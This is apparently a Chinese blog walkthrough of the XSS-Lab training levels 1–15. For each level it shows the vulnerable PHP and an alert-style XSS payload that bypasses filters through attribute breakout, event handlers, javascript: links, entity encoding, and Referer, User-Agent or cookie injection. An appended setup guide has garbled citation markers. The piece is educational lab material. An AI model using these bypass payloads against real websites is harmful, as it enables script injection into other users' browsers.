XSS-Lab 1-15

第1关

想要深刻理解xss就要理解源代码是怎么样的,就先从新手关里看看

$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";

直接获取一个叫name,并且输出这个name的值在界面上,所以我叫

?name=<script> alert(1) </script>

不过分吧

我们去看看

输完直接弹窗了

里面应该是欢迎用户什么都没有

第2关

先往输入框里输入

<script> alert(1) </script>

WTF?

我输对了啊,怎么不弹窗啊

看一眼界面源代码

原来是给我转义了

再看眼php源代码

echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>

原来是htmlspecialchars()函数的问题,他会将以下字符转义

字符转义
>>
<<
&&amp
"&quot

你放心接下来还会看见的

所以我们只能另寻道路

<input name=keyword  value="'.$str.'">

天无绝人之路啊,直接把value给闭合了,再注入script就可以了

"><script>alert('xss')</script>//

其中">进行闭合,而//则是注释掉

第3关

看了眼源代码,是两个都打上了htmlspecialchars()函数,就问你恶心不?

怎么办,那就弄一个点击事件得了

onclick该上场了

' οnclick='alert(1)' >//

不是再另外生成js脚本,而是直接生成一个点击事件

第4关

先试试第一关的办法

上面肯定是被转义了,下面是直接把<>给去掉了

那就再试试第三关的办法,把onclick代进去

" onclick='alert(1)' //

第5关

试一下第一关的办法,直接写进去

直接给我加_避免恶意注入了

没关系,试一下第4关的办法

诶,也不生效

赶紧去看下html界面

好家伙on也直接再中间加了个_

看了下源代码

$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);

欸嘿,还转小写.

不过,不着急

我们还可以写入一个恶意的超链接

因为他又没value的值进行检测

所以我们又可以乱写啦

"> <a href=javascript:alert('xss') > xss</a> //

第6关

先看眼源代码,淦

$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>

好家伙,不能像上一关那样直接写个网页了

但是他没有强制转小写啊,然后进行检测

嘿嘿,直接里面套个onclick处理

" Onclick='alert(1)' >//

第7关

看了眼源代码

$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>

眉头一皱,觉得事情有点不简单,tm这不是直接没了,还带转小写的

没事,魔高一尺,道高一丈,我让你删了后正好是我想要的字符不就完事了吗?

" oonnclick='alert(1)' //

欸嘿

你把我的on去掉了变成了onclick

第8关

一个友情连接吗?

肯定没这么简单 在看眼源代码

$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level8.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">

前面的各种骚操作都失效了,怎么办?

诶!我给他翻译翻译不就完事了吗?

javascript='alert(1)'

转码为poc

&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;

直接输进去就可以了

第9关

跟第8关一样,只不过多了个http://检测

直接alert(‘http://’)就行

可以局部转换

javasc&#x72;&#x69;pt:alert('xsshttp://')

第10关

看一眼源代码

有个t_sort在里面,只是进行<>检测

那么直接来个onclick

&t_sort=" type="text" οnclick="alert('xss')

可以看见直接不隐藏了,只是因为type优先第一个

第11关

再看一眼源代码

$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref"  value="'.$str33.'" type="hidden">

我们发现都会进行转码处理

诶 他没对http头进行处理,那么机会来了

抓包!

referer:"type="text" οnclick="alert('xss')

点一下那个方块就完事了

第12关

这个就跟第11关是一样的,要抓包,改头文件

只不过http头变为了 user-agent

user-agent:" type="text" onclick="alert('xss')

第13关

直接改cookie

$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_cook"  value="'.$str33.'" type="hidden">

我们发现他找到user的cookie 直接使用不处理

利用cookieEditor,也可以抓包

再刷新下界面

旧戏重演

第14关

不知道为啥用不了,直接15关

第15关

啥都没有,有点怪

看眼源代码

<span class="ng-include:'.htmlspecialchars($str).'">

我们可以利用ng-include.这相当于c语言里的clude

直接给他个有漏洞的php网页不就可以了吗?

?src='level1.php?name=<img src=1 οnerrοr=alert(1)>'

好了,结束,下班

### 下载与安装 XSS-Lab XSS-Lab 是一个基于 PHP 的学习平台,旨在帮助用户了解和实践跨站脚本攻击 (XSS) 的原理和技术。以下是关于如何下载和安装该工具的相关信息。 #### 1. 获取 XSS-Lab 源码 可以从其官方仓库或其他可信资源获取源代码。通常情况下,这类项目会托管在 GitHub 或其他类似的开源平台上。访问对应的存储库地址并克隆或下载 ZIP 文件到本地环境[^2]。 #### 2. 安装依赖项 由于 XSS-Lab 使用的是 PHP 编写的服务端逻辑,因此需要确保服务器上已配置好支持 PHP 脚本运行的 Web Server 和数据库管理系统(如果适用)。具体需求可能包括但不限于以下组件: - **Web Server**: Apache, Nginx 等能够处理动态页面请求的应用程序。 - **PHP 版本**: 推荐使用最新稳定版本或者至少满足最低兼容标准的版本号。 - **MySQL/MariaDB 数据库**(视情况而定): 如果某些关卡涉及数据持久化操作,则需设置相应的 DB 连接参数。 对于 Linux 用户来说,可以通过包管理器来快速部署这些服务;Windows 平台则推荐 XAMPP/WAMP 套件简化整个过程。 #### 3. 配置环境变量及权限调整 解压后的文件夹应放置于 webroot 目录下,默认路径可能是 `/var/www/html/` 对于 Ubuntu 发行版而言。接着修改 `config.php` 中有关站点 URL、管理员账户密码以及其他敏感选项的内容以适配实际应用场景的需求。 另外还需注意检查各目录读写执行权是否恰当分配给 httpd/nginx user group ,防止因权限不足而导致功能异常的现象发生。 #### 4. 启动服务验证正常工作状态 完成上述准备工作之后重启相关联的服务进程,并打开浏览器输入指定网址确认能否成功加载首页界面以及后续挑战环节链接均可正常使用即可认为初步搭建完毕。 ```bash sudo service apache2 restart # or for nginx users sudo systemctl reload nginx ``` --- ### 示例代码片段展示部分技巧应用实例 下面给出一段利用 HTML 注入实现弹窗效果的小例子供参考理解潜在风险所在之处: ```html <a href="javascript:alert('xss');">Click Me</a> <!-- 将 on 替换为 o_n 可绕过简单过滤机制 --> <img src=x onerror=alert(1)> <!-- 利用 URL 编码隐藏恶意字符 --> <img%0Asrc=1%0Aonerror=alert(1)> ``` 以上演示分别体现了直接嵌套 JavaScript 函数调用方式触发警告框提示消息;通过变形关键字规避检测手段达成相同目的;还有借助特殊转义序列混淆视听从而突破防御屏障三种不同类型的尝试手法][^[^34]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值